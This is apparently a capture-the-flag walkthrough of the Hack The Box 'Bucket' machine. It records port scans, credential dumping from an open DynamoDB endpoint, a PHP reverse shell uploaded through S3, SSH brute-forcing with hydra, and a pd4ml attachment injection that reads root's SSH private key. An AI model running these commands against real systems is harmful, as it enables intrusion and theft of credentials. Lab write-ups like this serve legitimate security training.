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478 lines (355 loc) · 15.6 KB

File metadata and controls

478 lines (355 loc) · 15.6 KB




ports=$(nmap -Pn -p- --min-rate=1000 -T4 | grep open | awk -F / '{print $1}' ORS=',') echo $ports && nmap -p$ports -sV -sC -v -T4 -oA scans/nmap.full

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/


  • redirected to bucket.htb ,

  • add bucket.htb in the /etc/hosts file .

  • crawling through bucket.htb i found some links in the source-code that indicates potential subdomain .

    <img src="http://s3.bucket.htb/adserver/images/bug.jpg" alt="Bug" height="160" width="160">
    <img src="http://s3.bucket.htb/adserver/images/malware.png" alt="Malware" height="160" width="160">
    <img src="http://s3.bucket.htb/adserver/images/cloud.png" alt="cheer" height="160" width="160">
  • add s3.bucket.htb in the /etc/hosts file



gobuster dir -u http://s3.bucket.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50

/health (Status: 200)
/shell (Status: 200)


  • goto s3.bucket.htb/health/ shows

    {"status": "running"}

  • goto s3.bucket.htb/health shows

    {"services": {"s3": "running", "dynamodb": "running"}}

  • so 2 services running, whom i know nothing about ,

ask google

s3 : Amazon S3 or Amazon Simple Storage Service is a service offered by Amazon Web Services that provides object storage through a web service interface.

  • so s3 is a amazon aws service which store data inside digital buckets .

dynamodb : Amazon DynamoDB is a fully managed proprietary NoSQL database service that supports key-value and document data structures and is offered by as part of the Amazon Web Services portfolio.

  • so dynamodb is a database service that manage bucket data .
  • these services running on hypercorn-h11 server , DOC .
  • google also indicates that the dynamodb is a NoSQL type database .


  • s3.bucket.htb/shell/ revealed a interactive DynamoDB JavaScript Shell .
  • using this shell we can talk to the backend database service and dump data from the server .
  • heading to the API Templates tab i found some prebuilt templates .
  • i read API Docs and build my own simple templates .
  • reading through google i found a awscli tool similar as webshell but can run from the terminal, tool


Configure awscli

  • before running awscli we need to configure it but when i configuring it asking for access_key and secret_key and i don't have these or don't know about

  • some googling i found a document

  • doc tells any credentials to work

    aws configure


Dump Data

  • First, find the table name, template for webshell

    aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ | jq -r .

        "TableNames": [
  • Second, scan users table, template for webshell

    aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ | jq -r .

          "Count": 3,
          "Items": [
      	    "username": {
      	    "S": "Mgmt"
      		"password": {
      		"S": "Management@#1@#"
      		"username": {
      		"S": "Cloudadm"
      		"password": {
      		"S": "Welcome123!"
      		"username": {
      		"S": "Sysadm"
      		"password": {
      		"S": "n2vM-<_K_Q:.Aa2"
          "ScannedCount": 3,
          "ConsumedCapacity": null



Enumerating through awscli

  • investing some time in awscli tool i found that i can list all buckets

    aws --endpoint-url=http://s3.bucket.htb s3api list-buckets | jq .

          "Owner": {
          	"DisplayName": "webfile",
          	"ID": "bcaf1ffd86f41161ca5fb16fd081034f"
          "Buckets": [
              "CreationDate": "2020-11-04T03:32:03.881865Z",
              "Name": "adserver"
    • threre is only one bucket

        "Name": "adserver"
  • view inside adserver bucket

    aws --endpoint-url=http://s3.bucket.htb s3api list-objects --bucket adserver | jq .

          "Contents": [
      	        "LastModified": "2020-11-04T03:42:13.000Z",
      	        "ETag": "\"25118cbb11c412f4b517249e6e877dc3\"",
      	        "StorageClass": "STANDARD",
      	        "Key": "images/bug.jpg",
      	        "Owner": {
      	        	"DisplayName": "webfile",
      	        	"ID": "75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a"
              	"Size": 37840
      	        "LastModified": "2020-11-04T03:42:13.000Z",
      	        "ETag": "\"4d7905acad5d78b01085e461f78eae43\"",
      	        "StorageClass": "STANDARD",
      	        "Key": "images/cloud.png",
      	        "Owner": {
      	        	"DisplayName": "webfile",
      	        	"ID": "75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a"
      	        "Size": 51485
      	        "LastModified": "2020-11-04T03:42:13.000Z",
      	        "ETag": "\"b22715647e087104f6b1ff7c0ce0731c\"",
      	        "StorageClass": "STANDARD",
      	        "Key": "images/malware.png",
      	        "Owner": {
      	        	"DisplayName": "webfile",
      	        	"ID": "75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a"
      	        "Size": 16486
      	        "LastModified": "2020-11-04T03:42:13.000Z",
      	        "ETag": "\"dadef349eabdda42a5ff5118a5b9c229\"",
      	        "StorageClass": "STANDARD",
      	        "Key": "index.html",
      	        "Owner": {
      	        	"DisplayName": "webfile",
      	        	"ID": "75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a"
      	        "Size": 5344
    • these files looks like bucket.htb source files
    • these file sync in every min or less to the main server
  • I try to upload file in the bucket and check if it is accessable from bucket.htb

    aws --endpoint-url=http://s3.bucket.htb s3 cp test.html s3://adserver

    upload: ./test.html to s3://adserver/test.html

    aws --endpoint-url=http://s3.bucket.htb s3 ls s3://adserver

    .                          PRE images/
    2020-11-04 04:16:12       5344 index.html
    2020-11-04 04:17:01         47 test.html

    curl -I http://bucket.htb/test.html

    HTTP/1.1 200 OK
    Date: Wed, 04 Nov 2020 04:17:18 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Wed, 04 Nov 2020 04:17:04 GMT
    ETag: "2f-5b3404073f723"
    Accept-Ranges: bytes
    Content-Length: 47
    Content-Type: text/html
  • some notable things,

    • uploaded file sync only once and the automatically deleted after it
    • file takes 30-60sec to sync
    • I can upload php shell and access from the main server

user Exploit

  • First, upload php shell in the bucket

    aws --endpoint-url=http://s3.bucket.htb s3 cp shell.php s3://adserver

  • Second, open netcat listener

    nc -nvlp 4141

  • Third, after sometime i go to bucket.htb/shell.php and shell pops in the netcat

  • got www-data shell

Enumerating www-data

cat /etc/passwd

  • don't find any thing in the www-data

  • only get the user roy

  • I check if user roy can has ssh enable

    ssh [email protected]

    [email protected]'s password:   
  • so roy has ssh enable

  • i am thinking about bruteforcing ssh but first try to use creds that dumped from the database

    hydra -l roy -P wordlist -t 4 ssh

    Hydra ( starting at 2020-11-04 10:19:34
    [DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task
    [DATA] attacking ssh://
    [22][ssh] host:   login: roy   password: n2vM-<_K_Q:.Aa2
    1 of 1 target successfully completed, 1 valid password found
    Hydra ( finished at 2020-11-04 10:19:42
  • found reused password n2vM-<_K_Q:.Aa2



ssh roy

ssh [email protected]

[email protected]'s password: n2vM-<_K_Q:.Aa2
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-48-generic x86_64)
roy@bucket:~$ cat user.txt

Enumerate user roy

  • check network

    roy@bucket:~$ ss -lnpt

    State     Recv-Q    Send-Q         Local Address:Port          Peer Address:Port               
    LISTEN    0         511           *
  • there is a local server running on port 8000

  • inside /var/www directory there are two directories

    drwxr-x---+  4 root root 4096 Sep 23 10:56 bucket-app
    drwxr-xr-x   2 root root 4096 Nov  4 08:20 html
  • goto local server directory /var/www/bucket-app/ found index.php

    roy@bucket:/var/www/bucket-app$ ls -la | grep index.php
    `-rwxr-x---+  1 root root  17222 Sep 23 03:32 index.php`
  • index.php contains php code snippet.

require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
        if($_POST["action"]==="get_alerts") {
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'

                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),

                foreach ($iterator as $item) {
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");

script breakdown

  • line 04, First if statement

    • this define that the script execute if user send a POST request .
  • line 05, Second if statement

    • this line defines that if server gets a post request its action must be a get_alerts
  • so i need to send a POST request with action=get_alerts

  • line 07-12, client variable

    $client = new DynamoDbClient([
                            'profile' => 'default',
                            'region'  => 'us-east-1',
                            'version' => 'latest',
                            'endpoint' => 'http://localhost:4566'
    • this code configure aws client connection
  • line 14-18, iteration variable

    $iterator = $client->getIterator('Scan', array(
                            'TableName' => 'alerts',
                            'FilterExpression' => "title = :title",
                            'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
    • this code iterate data from the database
  • but there there is only one table i already saw that

  • I think i need to create a table table before trigger that script

  • so i need to create a alerts table which contains item Ransomwar

  • line 20-23, foreach loop through the $iterator variable

    foreach ($iterator as $item) {
    • this code loop data that iterate from that table and set on $item variable

    • the $item data go inside the php function file_put_contents , php documentation

    • this function write $item variable data inside files directory as the name that $name variable defines example-name: 4141.html

      roy@bucket:/var/www/bucket-app$ ls -la | grep files
      drwxr-x---+  2 root root   4096 Sep 23 03:29 files
  • line 24, passthru function, php documentation

    passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
    • after example-name: 4141.html file generated, this file go through that php function passthru

    • this function copy pd4ml_demo.jar library form bucket-app directory

      roy@bucket:/var/www/bucket-app$ ls -la | grep pd4ml
      `-rwxr-x---+  1 root root 808729 Jun 10 11:50 pd4ml_demo.jar`
    • and then execute pd4cmd from pd4ml library

    • PD4ML is a Java library, which makes possible to create PDF documents from Java and JSP applications using HTML as template language

    • here is the pd4cmd documentation from pd4ml tool

    • so what is happening here is that the pd4cmd convert html file into a pdf file and store in the files/ direcotry as result.pdf

Exploit Surface

  • reading through the pd4ml documentation i found a PDF Attachments feature . PDF Attachments doc
  • i can use this feature to import root.txt as well as id_rsa in result.txt because this library run as root
  • for this to work i need to set pd4ml:attachment function inside the html file
  • i can do that by setting pd4ml:attachment function as data in the table alerts inside item Ransomware

Root Privesc

First, create alerts table , template for webshell

aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \

Second, put Ransomware item , template for webshell

aws dynamodb put-item \
--table-name alerts  \
--item \
    '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/.ssh/id_rsa</pd4ml:attachment>"}}' \

specify pd4ml:attachment function as item Ransomware data so when pd4cmd convert html file into pdf it also attech that file i specified

Third, create tunnel on port 8000 with ssh

ssh -L 8000: [email protected]

Fourth, send a post request to

curl -X POST -d "action=get_alerts" -v

as soon as request send successfully result.pdf file created

Note, result.pdf file deletes immediately after created in less then ~10sec and created table

to tackle this problem i use sshpass with scp and copy result.pdf file in my local machine as soon as it created

sshpass -p "n2vM-<_K_Q:.Aa2" scp [email protected]:/var/www/bucket-app/files/result.pdf result.pdf